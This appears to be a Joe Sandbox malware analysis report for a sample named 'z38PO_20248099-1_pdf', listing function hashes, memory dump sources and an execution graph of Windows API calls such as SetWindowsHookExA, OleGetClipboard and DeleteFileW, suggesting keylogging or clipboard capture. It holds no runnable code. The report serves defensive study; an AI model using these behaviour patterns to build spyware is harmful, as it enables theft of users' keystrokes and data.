                                • Opcode Fuzzy Hash: 2f9b6d23ffbf2e1997635dba6388153620c1a6fdcd2c02f548d85509ce733bab
                                • Instruction Fuzzy Hash: B321F571905344DFDB24DF10D5C0B16BB65FB84325F24C569DE0A4B2DAC336D84BDA62
                                Function 00F5D005 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443117407.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f5d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a99abb518b8451199966b7b3c0c98e9b4deaebcbe2d66004b706bf79a47ced1
                                • Instruction ID: cc22ec6c7952892f8e8d84a51887834a7e3461ab50cf4d9d2eb144727a7b20ce
                                • Opcode Fuzzy Hash: 0a99abb518b8451199966b7b3c0c98e9b4deaebcbe2d66004b706bf79a47ced1
                                • Instruction Fuzzy Hash: AB218E755093808FCB12CF20D990715BF71EB46324F28C5EAD9498B6A7C33A980ACB62
                                Function 00F5D1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443117407.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f5d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 2396b85fc8eeb2c68892c5597987550d4b4d74524e780aa1de23dff1f6f97afa
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 6D11BB75904280DFCB15CF10C9C0B15BBA1FB84324F28C6AEDD494B696C33AD84ACB61
                                Function 00BFD731 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1439144428.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_bfd000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 060c9b0dab5fe9ccea6ae3276d482d51a5f82d46f95d57992589efbd86bbf276
                                • Instruction ID: 561c8796bf323938343883c1e05ba22e857a27f16f70ca7d6b7f689555be64b7
                                • Opcode Fuzzy Hash: 060c9b0dab5fe9ccea6ae3276d482d51a5f82d46f95d57992589efbd86bbf276
                                • Instruction Fuzzy Hash: 2801F2321043489BE710AA21CDC4B76FBD9DF40320F28C49AEE084F282C6789C08CBB2
                                Function 00BFD730 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1439144428.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_bfd000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f30d885f3549f49b1df60a714fa9255f1346b1de43c50c572ed0a2310721019
                                • Instruction ID: dfa77fbb6709c271caf1ae3276749c5922205da8fbde2dc118483bbe453bee83
                                • Opcode Fuzzy Hash: 6f30d885f3549f49b1df60a714fa9255f1346b1de43c50c572ed0a2310721019
                                • Instruction Fuzzy Hash: C1F0C2320043449FE7109A16C984B62FBD8EB80334F28C59AED084F282C2799C44CB71

                                Non-executed Functions

                                Function 07116588 Relevance: .4, Instructions: 354COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 974e7d1d70b6996ba6ebab4fb3ac8f1664df47f5c0955af7671d8b457bef642b
                                • Instruction ID: 7e062364b8fb98e363e8edccd25cd0e2685ffc24ffbbad9e5abec54b7db60fc0
                                • Opcode Fuzzy Hash: 974e7d1d70b6996ba6ebab4fb3ac8f1664df47f5c0955af7671d8b457bef642b
                                • Instruction Fuzzy Hash: 3CD177B17007168FDB2AEB65C4507AAB7E7AF89600F14887AD14A8F6D0DF36E901CB51
                                Function 050BF398 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_50b0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2334acdcc86da66b77de95bfe547d0b6d01c30911dba656da678e4b7736e6e4
                                • Instruction ID: cfd4a354eea5280803cec5f4135baa047ebf5cd2cf325794f4841d3e463cde56
                                • Opcode Fuzzy Hash: e2334acdcc86da66b77de95bfe547d0b6d01c30911dba656da678e4b7736e6e4
                                • Instruction Fuzzy Hash: 93E11874E0461A8FDB14DFA8D980AAEFBF2BF89304F248169D415AB355D770AD41CF60
                                Function 07110040 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b77c411eabe81a2bc4f5e89217ef0e4b0dbefd47ba24fea31835b03a47ff0f96
                                • Instruction ID: c8e30ea141827dd3a9054577e79f2c88e5be9ddd79df45c4f391d56aba0e7047
                                • Opcode Fuzzy Hash: b77c411eabe81a2bc4f5e89217ef0e4b0dbefd47ba24fea31835b03a47ff0f96
                                • Instruction Fuzzy Hash: 4DE119B4E006198FDB14DFA8C581AAEFBB2FF89305F248169D415AB355D730AD81CF60
                                Function 0102DF9C Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 194cd3bcbeb42cae1493144420892a0f4d1ba72ed92e4dcdcf26b45574e7890d
                                • Instruction ID: 3c109ae4f901cd455186b086663833a399aa56dcb10279b20094fe09f0bbd2c2
                                • Opcode Fuzzy Hash: 194cd3bcbeb42cae1493144420892a0f4d1ba72ed92e4dcdcf26b45574e7890d
                                • Instruction Fuzzy Hash: 82A16F32E002268FCF15DFB8C4845EEBBF2FF85300B1545AAE905AB261DB75E956CB50
                                Function 050B5BF8 Relevance: .2, Instructions: 203COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_50b0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd0d22bee41bb1e01dde942b801b2fa7e8414e6495485c0e2ba4fb359f4cb3cd
                                • Instruction ID: d52324844b70e161d71381b943e6285e5490b25503d73c3d2fa766f958d94346
                                • Opcode Fuzzy Hash: bd0d22bee41bb1e01dde942b801b2fa7e8414e6495485c0e2ba4fb359f4cb3cd
                                • Instruction Fuzzy Hash: 3481E371D06218DFEF14CFA9E884AEDBBF6BF49300F10906AE419A7261EBB45945CF40

                                Execution Graph

                                Execution Coverage:11.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:214
                                Total number of Limit Nodes:22
                                execution_graph 40699 64a4cea 40700 64a4d38 GetModuleHandleW 40699->40700 40701 64a4d32 40699->40701 40702 64a4d65 40700->40702 40701->40700 40941 64ab6d8 40942 64ab6e3 40941->40942 40943 64ab6f3 40942->40943 40945 64ab178 40942->40945 40946 64ab728 OleInitialize 40945->40946 40947 64ab78c 40946->40947 40947->40943 40948 64a9c98 DuplicateHandle 40949 64a9d2e 40948->40949 40950 64a5d98 40951 64a5dd0 CreateWindowExW 40950->40951 40953 64a5ebc 40951->40953 40953->40953 40703 258d030 40704 258d048 40703->40704 40705 258d0a2 40704->40705 40712 64a375c 40704->40712 40720 64a6070 40704->40720 40724 64a5f50 40704->40724 40730 64a5f42 40704->40730 40736 64aa872 40704->40736 40745 64a374c 40704->40745 40713 64a3767 40712->40713 40714 64aa901 40713->40714 40716 64aa8f1 40713->40716 40717 64aa8ff 40714->40717 40761 64a9874 40714->40761 40749 64aaa18 40716->40749 40755 64aaa28 40716->40755 40721 64a6080 40720->40721 40824 64a3784 40721->40824 40723 64a6087 40723->40705 40725 64a5f76 40724->40725 40726 64a374c GetModuleHandleW 40725->40726 40727 64a5f82 40726->40727 40728 64a375c 2 API calls 40727->40728 40729 64a5f97 40728->40729 40729->40705 40731 64a5f50 40730->40731 40732 64a374c GetModuleHandleW 40731->40732 40733 64a5f82 40732->40733 40734 64a375c 2 API calls 40733->40734 40735 64a5f97 40734->40735 40735->40705 40737 64aa87a 40736->40737 40740 64aa88a 40736->40740 40737->40705 40738 64aa901 40739 64a9874 2 API calls 40738->40739 40742 64aa8ff 40738->40742 40739->40742 40740->40738 40741 64aa8f1 40740->40741 40743 64aaa18 2 API calls 40741->40743 40744 64aaa28 2 API calls 40741->40744 40743->40742 40744->40742 40746 64a3757 40745->40746 40747 64a3784 GetModuleHandleW 40746->40747 40748 64a6087 40747->40748 40748->40705 40751 64aaa28 40749->40751 40750 64a9874 2 API calls 40750->40751 40751->40750 40752 64aab0e 40751->40752 40768 64aaef0 40751->40768 40773 64aaf00 40751->40773 40752->40717 40757 64aaa36 40755->40757 40756 64a9874 2 API calls 40756->40757 40757->40756 40758 64aab0e 40757->40758 40759 64aaef0 OleGetClipboard 40757->40759 40760 64aaf00 OleGetClipboard 40757->40760 40758->40717 40759->40757 40760->40757 40762 64a987f 40761->40762 40763 64aab6a 40762->40763 40764 64aac14 40762->40764 40766 64aabc2 CallWindowProcW 40763->40766 40767 64aab71 40763->40767 40765 64a375c OleGetClipboard 40764->40765 40765->40767 40766->40767 40767->40717 40769 64aaef6 40768->40769 40770 64aaee6 40769->40770 40778 64ab4b8 40769->40778 40784 64ab4a7 40769->40784 40770->40751 40774 64aaf1f 40773->40774 40775 64aaf76 40774->40775 40776 64ab4b8 OleGetClipboard 40774->40776 40777 64ab4a7 OleGetClipboard 40774->40777 40775->40751 40776->40774 40777->40774 40780 64ab4c0 40778->40780 40779 64ab4d4 40779->40769 40780->40779 40790 64ab4f2 40780->40790 40801 64ab500 40780->40801 40781 64ab4e9 40781->40769 40786 64ab4b8 40784->40786 40785 64ab4d4 40785->40769 40786->40785 40788 64ab4f2 OleGetClipboard 40786->40788 40789 64ab500 OleGetClipboard 40786->40789 40787 64ab4e9 40787->40769 40788->40787 40789->40787 40791 64ab4fa 40790->40791 40792 64ab52d 40791->40792 40794 64ab571 40791->40794 40797 64ab4f2 OleGetClipboard 40792->40797 40798 64ab500 OleGetClipboard 40792->40798 40793 64ab533 40793->40781 40796 64ab5f1 40794->40796 40812 64ab7c8 40794->40812 40816 64ab7b8 40794->40816 40795 64ab60f 40795->40781 40796->40781 40797->40793 40798->40793 40802 64ab512 40801->40802 40803 64ab52d 40802->40803 40805 64ab571 40802->40805 40810 64ab4f2 OleGetClipboard 40803->40810 40811 64ab500 OleGetClipboard 40803->40811 40804 64ab533 40804->40781 40807 64ab5f1 40805->40807 40808 64ab7c8 OleGetClipboard 40805->40808 40809 64ab7b8 OleGetClipboard 40805->40809 40806 64ab60f 40806->40781 40807->40781 40808->40806 40809->40806 40810->40804 40811->40804 40814 64ab7dd 40812->40814 40815 64ab803 40814->40815 40820 64ab290 40814->40820 40815->40795 40818 64ab7c8 40816->40818 40817 64ab290 OleGetClipboard 40817->40818 40818->40817 40819 64ab803 40818->40819 40819->40795 40821 64ab870 OleGetClipboard 40820->40821 40823 64ab90a 40821->40823 40825 64a378f 40824->40825 40827 64a6157 40825->40827 40828 64a3624 40825->40828 40829 64a4cf0 GetModuleHandleW 40828->40829 40831 64a4d65 40829->40831 40831->40827 40954 64ad3b0 40955 64ad3f4 SetWindowsHookExA 40954->40955 40957 64ad43a 40955->40957 40832 2650848 40834 265084e 40832->40834 40833 265091b 40834->40833 40836 2651340 40834->40836 40838 2651343 40836->40838 40837 2651454 40837->40834 40838->40837 40843 26580f2 40838->40843 40847 2658219 40838->40847 40852 64a30d8 40838->40852 40860 64a3108 40838->40860 40844 265809b DeleteFileW 40843->40844 40846 26580fa 40843->40846 40845 26580bf 40844->40845 40845->40838 40846->40838 40848 2658223 40847->40848 40849 26582d9 40848->40849 40868 64cfa70 40848->40868 40872 64cfa80 40848->40872 40849->40838 40853 64a30dd 40852->40853 40855 64a31cb 40853->40855 40876 64a2e44 40853->40876 40885 64a2e84 GetModuleHandleW 40855->40885 40856 64a3191 40881 64a2e64 40856->40881 40858 64a320e 40858->40838 40861 64a311a 40860->40861 40862 64a31cb 40861->40862 40863 64a2e44 GetModuleHandleW 40861->40863 40940 64a2e84 GetModuleHandleW 40862->40940 40864 64a3191 40863->40864 40867 64a2e64 KiUserCallbackDispatcher 40864->40867 40866 64a320e 40866->40838 40867->40862 40869 64cfa95 40868->40869 40870 64cfca6 40869->40870 40871 64cfcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 40869->40871 40870->40849 40871->40869 40873 64cfa95 40872->40873 40874 64cfca6 40873->40874 40875 64cfcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 40873->40875 40874->40849 40875->40873 40877 64a2e4f 40876->40877 40886 64a42c0 40877->40886 40893 64a42ab 40877->40893 40878 64a336a 40878->40856 40882 64a2e6f 40881->40882 40884 64aae4b 40882->40884 40936 64a98cc 40882->40936 40884->40855 40885->40858 40887 64a42eb 40886->40887 40900 64a4840 40887->40900 40906 64a4831 40887->40906 40888 64a436e 40889 64a3624 GetModuleHandleW 40888->40889 40890 64a439a 40888->40890 40889->40890 40894 64a42c0 40893->40894 40898 64a4840 GetModuleHandleW 40894->40898 40899 64a4831 GetModuleHandleW 40894->40899 40895 64a436e 40896 64a3624 GetModuleHandleW 40895->40896 40897 64a439a 40895->40897 40896->40897 40898->40895 40899->40895 40901 64a486d 40900->40901 40902 64a48ee 40901->40902 40912 64a4ace 40901->40912 40920 64a4a25 40901->40920 40928 64a4a0f 40901->40928 40907 64a4840 40906->40907 40908 64a48ee 40907->40908 40909 64a4ace GetModuleHandleW 40907->40909 40910 64a4a0f GetModuleHandleW 40907->40910 40911 64a4a25 GetModuleHandleW 40907->40911 40909->40908 40910->40908 40911->40908 40913 64a4aee 40912->40913 40914 64a3624 GetModuleHandleW 40913->40914 40915 64a4b3a 40914->40915 40916 64a3624 GetModuleHandleW 40915->40916 40919 64a4bb4 40915->40919 40917 64a4b88 40916->40917 40918 64a3624 GetModuleHandleW 40917->40918 40917->40919 40918->40919 40919->40902 40921 64a4a3e 40920->40921 40922 64a3624 GetModuleHandleW 40921->40922 40923 64a4b3a 40922->40923 40924 64a3624 GetModuleHandleW 40923->40924 40927 64a4bb4 40923->40927 40925 64a4b88 40924->40925 40926 64a3624 GetModuleHandleW 40925->40926 40925->40927 40926->40927 40927->40902 40929 64a4a1a 40928->40929 40930 64a3624 GetModuleHandleW 40929->40930 40931 64a4b3a 40930->40931 40932 64a3624 GetModuleHandleW 40931->40932 40935 64a4bb4 40931->40935 40933 64a4b88 40932->40933 40934 64a3624 GetModuleHandleW 40933->40934 40933->40935 40934->40935 40935->40902 40937 64aae60 KiUserCallbackDispatcher 40936->40937 40939 64aaece 40937->40939 40939->40882 40940->40866

                                Executed Functions

                                Function 064C56A8 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: c8c0a4b50506c8895943600f7618c97b5fafbe9fe8812503a6af4b87d867848b
                                • Instruction ID: 8704ccb9f642270647dcadd7ec040f4f84adac9bf5734424e51f5bc7c7be84f2
                                • Opcode Fuzzy Hash: c8c0a4b50506c8895943600f7618c97b5fafbe9fe8812503a6af4b87d867848b
                                • Instruction Fuzzy Hash: 7922B675E002149FDFA5DBA4D4846AEBBB2FF85320F14846AD416EB344DB31EC51CB91
                                Function 064C274A Relevance: 1.1, Instructions: 1051COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a548aab596aabd520d7cc4dde852b8ba2fca21a3ae30a1da73d8aa811f94307d
                                • Instruction ID: b99625632a01afd3970bff696bfb5523ea8836ecc0ab6f73e2aa2f4cd9671462
                                • Opcode Fuzzy Hash: a548aab596aabd520d7cc4dde852b8ba2fca21a3ae30a1da73d8aa811f94307d
                                • Instruction Fuzzy Hash: EFA21538A002148FDBA5DF68C584B5EBBB2FB49324F54C5AAD4099B361DB75ED81CF40
                                Function 064C6700 Relevance: .8, Instructions: 824COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1998c4c38c2ccfef6d47b18a6a9bc08b250d7cd08e0d3b23a13f6db1d7a82668
                                • Instruction ID: df40a766299bcf6d161e624b5eef47e11e38ff86814948fb0896f3bd601b9f5f
                                • Opcode Fuzzy Hash: 1998c4c38c2ccfef6d47b18a6a9bc08b250d7cd08e0d3b23a13f6db1d7a82668
                                • Instruction Fuzzy Hash: AA628E38A006149FDB95DB68D590AAEB7F2FF89320F15C46AD406DB354DB71EC42CB90
                                Function 064CB342 Relevance: .6, Instructions: 574COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbeacec0b186f7caa4fdb4acf9d2a164102e3b08dbb8d4bec9ae4b6cb377fb83
                                • Instruction ID: a3768b4e36abf0062db854db1b456720e809551ef9fefa9663cc44a243e2683d
                                • Opcode Fuzzy Hash: fbeacec0b186f7caa4fdb4acf9d2a164102e3b08dbb8d4bec9ae4b6cb377fb83
                                • Instruction Fuzzy Hash: 7A227678E002098FEFA5DBA8D4917AEB7B2FB85320F20846AE445DB355DA34DC41DB51
                                Function 064C3578 Relevance: .5, Instructions: 545COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9fcc44018bdf0c55b3a3697f0b25249030ffad7a926ba6fc1610223f25c66d8
                                • Instruction ID: 45f8ec1d753817b7137d61e64c13c7698c8c0457c4ac250eadde49e56d7040b3
                                • Opcode Fuzzy Hash: e9fcc44018bdf0c55b3a3697f0b25249030ffad7a926ba6fc1610223f25c66d8
                                • Instruction Fuzzy Hash: 18324E35E10B19CFDB55EF79C89069DB7B2BFC9310F50C6AAD409A7214EB70A981CB90
                                Function 064C7E90 Relevance: .5, Instructions: 478COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88b575ebad7ed6fab968a50c8476f619af93d7acf1813b35c7051faa491a8d3c
                                • Instruction ID: a93bd1b2b6c4e80fdc761de01b1f1b3960153edc5c814620b1bb7243d456625d
                                • Opcode Fuzzy Hash: 88b575ebad7ed6fab968a50c8476f619af93d7acf1813b35c7051faa491a8d3c
                                • Instruction Fuzzy Hash: 12028D34B006159FDB95DB68D8906AEBBF2FF84320F24856AD416DB354DB71EC42CB90
                                Function 0265EE90 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 786 265ee90-265eeab 787 265eed5-265eeeb 786->787 788 265eead-265eed4 786->788 808 265eeed call 265ee90 787->808 809 265eeed call 265ef78 787->809 791 265eef2-265eef4 792 265eef6-265eef9 791->792 793 265eefa-265ef59 791->793 800 265ef5f-265efec GlobalMemoryStatusEx 793->800 801 265ef5b-265ef5e 793->801 804 265eff5-265f01d 800->804 805 265efee-265eff4 800->805 805->804 808->791 809->791
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71d9a6342ff9c3609d37b87c8f5b8907482d106a0a5a1f03b08f2a68a4456751
                                • Instruction ID: d183370015cd14bf82965b06d4a8ca577d86597e22e83a41b911946264911bbb
                                • Opcode Fuzzy Hash: 71d9a6342ff9c3609d37b87c8f5b8907482d106a0a5a1f03b08f2a68a4456751
                                • Instruction Fuzzy Hash: C4412432D043599FDB10CFA9D8043DEBBF1EF89210F14826AE858E7280DB749945CBE0
                                Function 026580F2 Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 810 26580f2-26580f8 811 265809b-26580bd DeleteFileW 810->811 812 26580fa-2658115 810->812 814 26580c6-26580ee 811->814 815 26580bf-26580c5 811->815 816 2658117-265811a 812->816 815->814 817 265814d-2658150 816->817 818 265811c-2658130 816->818 821 2658164-2658167 817->821 822 2658152-2658159 817->822 830 2658136 818->830 831 2658132-2658134 818->831 825 2658177-265817a 821->825 826 2658169 call 2658b60 821->826 823 265815f 822->823 824 2658328-265832f 822->824 823->821 832 2658331 824->832 833 265833e-2658345 824->833 828 26581b6-26581b8 825->828 829 265817c-26581b1 825->829 834 265816f-2658172 826->834 836 26581bf-26581c2 828->836 837 26581ba 828->837 829->828 835 2658139-2658148 830->835 831->835 849 2658331 call 265f2e0 832->849 850 2658331 call 265f19f 832->850 834->825 835->817 836->816 839 26581c8-26581d7 836->839 837->836 838 2658337 838->833 842 2658201-2658217 839->842 843 26581d9-26581dc 839->843 842->824 845 26581e4-26581ff 843->845 845->842 845->843 849->838 850->838
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 026580B0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3859073445.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2650000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 1a8aced59cce787189993c88f4f8825f3ed11cac92138986a66c231d1e312e11
                                • Instruction ID: f9a3314e58c98cd1f46cb49e52fa569afce71e6c2b11bcc4d644d8967f9e3d70
                                • Opcode Fuzzy Hash: 1a8aced59cce787189993c88f4f8825f3ed11cac92138986a66c231d1e312e11
                                • Instruction Fuzzy Hash: 24418E71E0022A9BEF24DFA5C84079EBBB1FF45314F10896AE805FB740E7B59885CB91
                                Function 064A5D92 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 852 64a5d92-64a5d94 853 64a5dd0-64a5dfe 852->853 854 64a5d96-64a5dcd 852->854 856 64a5e09-64a5e10 853->856 857 64a5e00-64a5e06 853->857 854->853 858 64a5e1b-64a5e53 856->858 859 64a5e12-64a5e18 856->859 857->856 860 64a5e5b-64a5eba CreateWindowExW 858->860 859->858 861 64a5ebc-64a5ec2 860->861 862 64a5ec3-64a5efb 860->862 861->862 866 64a5f08 862->866 867 64a5efd-64a5f00 862->867 868 64a5f09 866->868 867->866 868->868
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064A5EAA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 82350d78931f2c091b54c3d760dbf5ec5da4cbabc426a36beb01655db3c43faf
                                • Instruction ID: 1de947efe332e77b32e57d36417112bf3b5b229d5968c032447bf5a7138384ff
                                • Opcode Fuzzy Hash: 82350d78931f2c091b54c3d760dbf5ec5da4cbabc426a36beb01655db3c43faf
                                • Instruction Fuzzy Hash: FD51C0B5D10309AFDF15CF9AD984ADEBBB5FF88310F24812AE418AB250D7759845CF90
                                Function 064A5D98 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 869 64a5d98-64a5dfe 871 64a5e09-64a5e10 869->871 872 64a5e00-64a5e06 869->872 873 64a5e1b-64a5eba CreateWindowExW 871->873 874 64a5e12-64a5e18 871->874 872->871 876 64a5ebc-64a5ec2 873->876 877 64a5ec3-64a5efb 873->877 874->873 876->877 881 64a5f08 877->881 882 64a5efd-64a5f00 877->882 883 64a5f09 881->883 882->881 883->883
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064A5EAA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 111bd32f328a79662fa1950fcfcf1f1b4e8f15e1788bb9be2a9e6ed5b6ec1d1d
                                • Instruction ID: 28464f4198bcb8f277770e4ba3c51dd1e17423dd3698cac3bacc7dd3a636c3af
                                • Opcode Fuzzy Hash: 111bd32f328a79662fa1950fcfcf1f1b4e8f15e1788bb9be2a9e6ed5b6ec1d1d
                                • Instruction Fuzzy Hash: D241B0B1D10309AFDB14CF9AD984ADEBBB5FF48310F24812AE819AB250D775A845CF90
                                Function 064A9874 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 884 64a9874-64aab64 887 64aab6a-64aab6f 884->887 888 64aac14-64aac34 call 64a375c 884->888 890 64aabc2-64aabfa CallWindowProcW 887->890 891 64aab71-64aaba8 887->891 895 64aac37-64aac44 888->895 893 64aabfc-64aac02 890->893 894 64aac03-64aac12 890->894 897 64aabaa-64aabb0 891->897 898 64aabb1-64aabc0 891->898 893->894 894->895 897->898 898->895
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 064AABE9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899024653.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64a0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: fc23304999e1f2b1ca573581839b2b7bc8c9be21caee68c95b697df2c3f92444
